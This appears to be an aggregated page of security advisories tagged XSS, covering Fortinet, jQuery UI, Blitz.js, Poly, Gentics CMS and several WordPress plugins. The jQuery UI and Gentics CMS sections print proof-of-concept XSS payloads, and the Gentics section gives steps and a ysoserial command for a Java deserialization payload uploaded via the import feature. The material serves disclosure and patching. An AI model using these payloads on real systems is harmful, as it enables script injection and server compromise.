An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiAuthenticator OWA Agent for Microsoft version 2.2 and 2.1 may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests.

** PSIRT Advisories**

**FortiAuthenticator - XSS vulnerability in OWA login page**

**Summary**

An improper neutralization of input during web page generation vulnerability \[CWE-79\] in FortiAuthenticator OWA Agent may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests.

**Affected Products**

FortiAuthenticator Agent for Microsoft OWA version 2.2,  
FortiAuthenticator Agent for Microsoft OWA version 2.1.

**Solutions**

Please upgrade to FortiAuthenticator Agent for Microsoft OWA version 2.3 or above.

**Acknowledgement**

Fortinet is pleased to thank Mohamad Hammad for bringing this issue to our attention under responsible disclosure.

CVE-2022-22304: Fortiguard

### Impact
Initializing a checkboxradio widget on an input enclosed within a label makes that parent label contents considered as the input label. If you call `.checkboxradio( "refresh" )` on such a widget and the initial HTML contained encoded HTML entities, they will erroneously get decoded. This can lead to potentially executing JavaScript code.

For example, starting with the following initial secure HTML:
```html
<label>
	<input id="test-input">
	&lt;img src=x onerror="alert(1)"&gt;
</label>
```
and calling:
```js
$( "#test-input" ).checkboxradio();
$( "#test-input" ).checkboxradio( "refresh" );
```
will turn the initial HTML into:
```html
<label>
	
	<input id="test-input">
	<img src=x onerror="alert(1)">
</label>
```
and the alert will get executed.

### Patches
The bug has been patched in jQuery UI 1.13.2.

### Workarounds
To remediate the issue, if you can change the initial HTML, you can wrap all the non-input contents of the `label` in a `span`:
```html
<label>
	<input id="test-input">
	<span>&lt;img src=x onerror="alert(1)"&gt;</span>
</label>
```

### References
https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/

### For more information
If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc). If you don't find an answer, open a new issue.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-31160

**jQuery UI Cross-site Scripting when refreshing a checkboxradio with an HTML-like initial text label**

Moderate severity GitHub Reviewed Published Jul 18, 2022 in jquery/jquery-ui

**Package**

npm jquery-ui (npm)

**Affected versions**

< 1.13.2

**Impact**

Initializing a checkboxradio widget on an input enclosed within a label makes that parent label contents considered as the input label. If you call .checkboxradio( "refresh" ) on such a widget and the initial HTML contained encoded HTML entities, they will erroneously get decoded. This can lead to potentially executing JavaScript code.

For example, starting with the following initial secure HTML:

<label\>
	<input id\="test-input"\>
	&lt;img src=x onerror="alert(1)"&gt;
</label\>

and calling:

$( "#test-input" ).checkboxradio();
$( "#test-input" ).checkboxradio( "refresh" );

will turn the initial HTML into:

<label\>
	
	<input id\="test-input"\>
	<img src\=x onerror\="alert(1)"\>
</label\>

and the alert will get executed.

**Patches**

The bug has been patched in jQuery UI 1.13.2.

**Workarounds**

To remediate the issue, if you can change the initial HTML, you can wrap all the non-input contents of the label in a span:

<label\>
	<input id\="test-input"\>
	<span\>&lt;img src=x onerror="alert(1)"&gt;</span\>
</label\>

**References**

https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/

**For more information**

If you have any questions or comments about this advisory, search for a relevant issue in the jQuery UI repo. If you don't find an answer, open a new issue.

**References**

*   GHSA-h6gj-6jjq-h8g9
*   https://nvd.nist.gov/vuln/detail/CVE-2022-31160
*   jquery/jquery-ui@8cc5bae
*   https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/

GHSA-h6gj-6jjq-h8g9: jQuery UI Cross-site Scripting when refreshing a checkboxradio with an HTML-like initial text label

Chain of exploits could be triggered without any authentication

Chain of exploits could be triggered without any authentication

Blitz.js, a JavaScript web application framework, has patched a dangerous prototype pollution vulnerability that could lead to remote code execution (RCE) on Node.js servers.

Prototype pollution is a type of JavaScript vulnerability that allows attackers to exploit the rules of the programming language to change an application’s behavior and compromise it in various ways.

The new bug, discovered and reported by researchers at Sonar, allowed attackers to manipulate the code in the Blitz.js app to create a reverse shell and run arbitrary commands on the server.

**Prototype vulnerability in dependencies**

“Blitz.js is an upcoming JS framework that gained traction on GitHub,” Paul Gerste, vulnerability researcher at Sonar, told _The Daily Swig_. “We selected it in order to help secure its code base and study real-world vulnerabilities.”

Blitz is built on top of Next.js, a React-based framework, and adds components to turn it into a full-stack web development platform.

**DEEP DIVES** Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications

One of the advertised features of Blitz.js is its ‘Zero-API’ layer, which allows the client to invoke server-side business logic through simple functions without the need to write API code.

Blitz.js makes an RPC call to the server in the background and returns the response to the client function call.

“Blitz.js adds an RPC layer on top of Next.js (among other features), and that layer uses superjson to deserialize data from incoming requests. The vulnerability is entirely inside of superjson,” Gerste said.

As an extended version of JSON, superjson adds support for dates, regexes, and circular dependencies. The circular dependency feature allows JSON specifications to reference property names, which caused the prototype vulnerability. An attacker could use these property names to change the running code on the server.

**RCE on Blitz servers**

Gerste discovered a chain of exploits that could be triggered through the prototype pollution vulnerability and lead to RCE.

First, a polluted JSON request is sent to the server, which triggers the routing mechanism of Blitz.js to load a JavaScript file with the polluted prototype. This allows the attacker to use the malicious JavaScript object to execute arbitrary code.

Read more of the latest infosec research news

Ideally, an attacker would create and run a file on the server. But Blitz.js does not support upload functionality. However, it has a CLI wrapper script that uses JavaScript’s function to launch a new process.

The attacker could use this function to launch a CLI process and run an arbitrary command on the server.

  
  
Prototype pollution in Blitz.js (Image: sonarsource.com)

What makes this vulnerability especially dangerous is that it can be triggered without any authentication, which means any user who can access the Blitz.js application will be able to launch RCE attacks.

“An attacker would have the same level of privilege as the vulnerable application,” Gerste said. “So, if the application runs as root, the attacker would also have root privileges.”

**Complicated bug**

Prototype pollution bugs often act in very complicated ways. For example, in the case of Blitz.js, the CLI wrapper object was not vulnerable per se but could be abused by the prototype pollution bug.

“This attack technique leverages a code pattern that isn’t a vulnerability in itself,” Gerste said. “Prototype pollution can influence the target application in a very invasive way, and it would require a lot of work to get rid of all code that could be influenced by prototype pollution.”

In his write-up of the bug, Gerste gives some general recommendations that can harden JavaScript apps against prototype pollution, including freezing or using the flag in Node.js.

“I think prototype pollution is still unknown to many JavaScript developers,” Gerste said. “I don’t see developers use the patterns that we recommended in our article very often. With our blog posts, we try to help educate JavaScript developers and share this knowledge.”

**YOU MIGHT ALSO LIKE** Microsoft Teams security vulnerability left users open to XSS via flawed stickers feature

Prototype pollution in Blitz.js leads to remote code execution

An issue was discovered in Poly EagleEye Director II before 2.2.2.1. os.system command injection can be achieved by an admin.

DATE

ID#

TITLE

03-07-22

PLYTV21-09

Studio X50 – Improper Neutralization of Special Elements used in an OS Command

03-07-22

PLYPL21-12

EEDII – Multiple Security Vulnerabilities

02-23-22

PLYGN21-08

Poly Systems – Apache Log4j

09-29-21

Security Advisory Version 1.0

Plantronics Hub – Local Privilege Escalation

09-07-21

Security Bulletin Version 1.0

CX5100/CX5500 Authenticated Command Injection

04-30-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly VOIP Phones

02-24-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly VOIP Phones

02-24-21

Security Bulletin Version 1.1

Increased SIP Provisioning Attacks

02-22-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly ZTP Service

01-20-21

Security Bulletin Version 1.0

Cybersecurity and Infrastructure Security Agency (CISA) Alert AA20-352A

04-24-20

Security Bulletin Version 1.0

Poly Recommended Best Security Practices for Unified Communications

04-01-20

Security Advisory Version 1.0

Poly Voice Endpoints – XSS and CSRF Vulnerabilities

02-07-20

Security Bulletin Version 1.0

CCX500 - UI Vulnerability Allows Access to Android Settings

01-15-20

Security Bulletin Version 1.6

Worldwide H.323 and SIP Botnet Calling Video Systems

01-10-20

Security Advisory Version 1.2.0

Remote Code Execution Vulnerability in UCS Software

01-10-20

Security Advisory Version 1.0.0

Vulnerabilities in VxWorks Operating System and Poly Products

09-04-19

Security Advisory Version 1.0.0

Plantronics Hub - Local Privilege Escalation Vulnerability

08-06-19

Security Advisory Version 1.0

Remote Code Execution Vulnerability in Obihai OBi1022

06-19-19

Security Advisory Version 1.1

Insufficient Authentication Resulting in Information Leakage on VVX Products

06-14-19

Security Advisory Version 1.1

Hard Coded Credentials Vulnerability in VVX Products

04-26-19

Security Advisory Version 1.0

Multiple Vulnerabilities in HDX Products Older than 3.1.14

02-20-19

Security Bulletin Version 1.0

HDX (versions older than 3.1.13) can be affected by multiple Botnets

01-24-19

Security Advisory Version 1.1

Cyber Threats Targeting Default Passwords

11-30-18

Security Bulletin Version 1.1

TLS 1.2 and Microsoft O365 Impacts to Polycom Products

11-05-18

Security Bulletin Version 1.0

Bluetooth Authentication Weakness Found in Trio

11-05-18

Security Bulletin Version 1.0

Stored Cross-Site Scripting Found in Trio

11-01-18

Security Bulletin Version 1.0

Remote Code Execution Vulnerability Found in Group Series

08-10-18

Security Bulletin Version 1.1

HDX SoftwareVersions Older than 3.1.12 and Omni Botnet

07-12-18

Security Advisory Version 1.9

Processor Based "Speculative Execution" Vulnerabilities AKA "Spectre" and "Meltdown" on Polycom Products

07-11-18

Security Advisory Version 1.2

Vulnerabilities in Polycom VVX Phones and UC Software

07-03-18

Security Advisory Version 1.0

Polycom UCS Software Vulnerabilities

06-26-18

Security Advisory Version 1.1

RealPresence Web Suite Vulnerability

05-10-18

Security Advisory Version 1.0

RealPresence Debut Vulnerabilities

03-05-18

Security Advisory Version 1.0

QDX 6000 Vulnerabilities

12-20-17

Security Advisory Version 1.2

"Krack" Vulnerability with Polycom Products

11-24-17

Security Advisory Version 1.2

Remote Code Execution on HDX Endpoints

10-18-17

Security Advisory Version 1.1

BlueBorne Bluetooth Vulnerabilities

08-28-17

Security Advisory Version 1.0

Information Disclosure on Multiple Polycom Products

08-11-17

Security Bulletin Version 1.1

WannaCry Vulnerability and Polycom Products

06-14-17

Security Bulletin Version 1.0

Relating to CVE-2017-7494 "SambaCry" Vulnerability and Polycom Products

03-22-17

Security Bulletin Version 1.0

Relating to CVE-2017-5638 "Apache Struts" Vulnerability and Polycom Products

10-26-16

Security Advisory Version 1.1

Relating to CVE-2016-5195 "Dirty COW" Vulnerability

09-20-16

Security Advisory Version 2.0

Relating to a Cross-site Scripting (XSS) Vulnerability in Polycom HDX Video Endpoints

09-13-16

Security Advisory Version 1.0

Relating to an XML External Entity (XXE) Vulnerability in Polycom HDX Video Endpoints)

04-06-16

Security Advisory Version 1.2

Relating to a GNU glibc DNS Vulnerability (CVE-2015-7547)

03-08-16

Security Bulletin Version 1.0

Relating to CVE-2016-0800 “DROWN” Vulnerability and Polycom Products

02-09-16

Security Office Update 2.0

Security Update Relating to H.323 and SIP AES Media Encryption on Polycom Products

12-16-15

Security Advisory Version 1.0

Relating to RealPresence Capture Server and RealPresence Media Suite Appliance Editions

12-09-15

Security Advisory Version 1.0

Relating to Path Traversal Vulnerabilities in Polycom VVX Business Media Phones

10-23-15

Security Advisory Version 2.0

Relating to GHOST glibc Vulnerability

10-23-15

Security Advisory Version 1.6.1

Relating to Logjam Vulnerability

06-29-15

Security Bulletin Version 1.0

RealPresence Resource Manager 8.4 security fixes summary

06-23-15

Security Advisory Version 1.0

Relating to Command Shell Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Inadequate SSH Restrictions Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Software Update Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Weak Entropy Vulnerability in Polycom Group Series Video Endpoints Web Cookies

06-17-15

Security Bulletin Version 1.0

Relating to "Tomcat Denial of Service"

06-15-15

Security Bulletin Version 1.0

Relating to Leap Second Insertion

04-20-15

Security Bulletin Version 1.6

Relating to SSLv3 "POODLE" Vulnerability and Polycom Products

10-24-14

Security Advisory Version 1.7

Relating to Bash shell arbitrary code execution on Various Polycom Products

10-06-14

Security Bulletin Version 1.2

Relating to Multiple OpenSSL Vulnerabilities on Various Polycom Products

06-05-14

Security Advisory Version 1.12

Relating to OpenSSL Vulnerability “Heartbleed” on Various Polycom Products

12-20-13

Security Bulletin 5471

Relating to JBoss Application Server on RealPresence Resource Manager

03-14-13

Security Bulletin 102404

Security Advisory relating to telnet shell authorization bypass on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107522

Security Advisory Relating to the Firmware Update Command Injection Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107523

Security Advisory Relating to the Command Shell Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107524

Security Advisory Relating to the H.323 Format String Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107525

Security Advisory Relating to the H.323 CDR Database SQL Injection on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107526

Security Advisory Relating to the PUP File Header MAC Signature Bypass on Polycom HDX Video Endpoints

CVE-2022-26482: Security Center

An issue was discovered in Gentics CMS before 5.43.1. There is stored XSS in the profile description and in the username.

Gentics CMS is a solution to design and manage a website. The CMS is vulnerable to two vulnerabilities that lead to stored Cross-Site-Scripting (XSS) as well as Remote Code Execution (RCE) via unsafe deserialization of Java objects.

**Vendor description**

_"APA-IT Informations Technologie GmbH offers offers support with a focus on media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press Agency, we are responsible for the IT of the Austrian news agency as well as numerous other media enterprises._

_This expertise and insight into the industry make APA-IT an expert for IT solutions for publishers and media-related companies. Existing systems and tools are constantly developed and tailored to individual customer needs. As such, APA-IT is always available – from conception to operation."_ 

Source: https://www.gentics.com/genticscms/company\_gentics.en.html

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. 

**Vulnerability overview/description****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

Multiple cross-site scripting vulnerabilities are present in the application. An attacker can store malicious JavaScript code in the username and profile description. The code will execute once an admin user hovers over the attacker's username. Thus, the attacker can execute code in the context of an admin. 

**2) Unsafe Java Deserialization (CVE-2022-30981) **

The Gentics CMS has an import option which will accept ZIP files. The archive includes a Java serialized object that gets deserialized on import. This can lead to code execution on the server. 

A low privileged user might be able to exploit this vulnerability by chaining it together with vulnerability 1). 

**Proof of concept****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

To trigger the first XSS, an attacker has to change the profile description to include a payload, e.g. **"<script>alert(document.domain)</script)".** The payload will execute once a user with access to the userlist hovers his mouse over the profile name. The event "onmouseover" will trigger following code: 

    JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br> 
    <script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
    ( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' ); 

The execution of the code leads to following function: 

    function JSI3_comp_list_401__ass( obj, title, text, assTitle ) 
    { 
    JSI3_comp_list_401__assReset(); 
    clearTimeout( JSI3_comp_list_401___ass_timeout ); 
    JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ); 
    } 

The malicious code, which is contained in the "text" parameter, gets passed through to the next function. There it is added to an HTML element and thus executed in the browser. 

    function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) { 
             if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) { 
                 JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true; 
                 $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:'')); 
                 $(obj).tipsy({ 
                         trigger: 'manual', 
                         html: true, 
                         offset: 3, 
                         delayIn: 900, 
                         delayOut: 0, 
                         opacity: 0.85, 
                         gravity: 'nww' 
                  }); 
              } 
              $(obj).tipsy("show"); 
              gcn_active_tipsy = obj; 
    } 

Another XSS vector can be found in the parameters "First Name" and "Last Name". 

By e.g. changing the last name to 'Node" onload="alert(document.domain)',  JavaScript code is added to the profile picture that is loaded in the upper right corner on every page. The following snippet shows the vulnerable line of code: 

    <div id="profil"> 
    <div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div> 

The third XSS is caused by changing the first and last name into JavaScript code without prior encoding. Changing the last name to "Last Name'+eval(alert(document.domain))+'" will cause the following code to be included in the server's response: 

    <script language="JavaScript" type="text/javascript"> 
    var menus = new Array(); 
    var imgs = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1; 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

**2) Unsafe Java Deserialization (CVE-2022-30981) **

First, a malicious ZIP archive needs to be created. The following files will need to be included within this archive: 

    bundlebuild.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <bundlebuild>
            <bundleinfo>
                  <name><![CDATA[test4]]></name>
                  <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>
                  <description><![CDATA[]]></description>
                  <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>
                  <globalprefix>D77D</globalprefix>
             </bundleinfo>
             <builds>
                     <build>
                           <builddate>1618996405</builddate>
                           <changelog><![CDATA[test4]]></changelog>
                           <count>0</count>
                     </build>
              </builds>
              <tables>
              </tables>
    </bundlebuild>
    
    containedobjects.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <objects>
    </objects>

The third file has to be named "serializedjava.bin" and contains the actual payload. A demo payload can be generated with following command: 

    $ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin 

Those three files have to be zipped together into an archive, which can be uploaded. 

The import feature is available under Enterprise CMS -> Administration -> Import and Export. Now select New->Import and upload the malicious ZIP archive. 

Wait until the import completed. Now click on "Test succeeded" in the file list. On the new screen select "Start import in background". The payload should create a file called "upload\_<random\_uuid>.tmp" in the folder /tmp. It will contain the string "SECTEST".  

Better deserialization chains could be built to reach more interesting targets. It is very likely, that RCE could be obtained by writing an own deserialization chain. 

**Vulnerable / tested versions**

The following product version has been tested and found to be vulnerable. Other versions are vulnerable as well, please see the vendor's changelog in the solution section. 

*   Gentics CMS 5.36.29

**Vendor contact timeline**

CVE-2022-30982: Multiple vulnerabilies in Gentics CMS

The Accept Stripe Payments WordPress plugin before 2.0.64 does not sanitize and escape some of its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-2194

The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers

CVE-2022-2187

The Simple Post Notes WordPress plugin before 1.7.6 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

CVE-2022-2186

The Advanced Database Cleaner WordPress plugin before 3.1.1 does not escape numerous generated URLs before outputting them back in href attributes of admin dashboard pages, leading to Reflected Cross-Site Scripting

CVE-2022-2173

The Loading Page with Loading Screen WordPress plugin before 1.0.83 does not escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Tag

#xss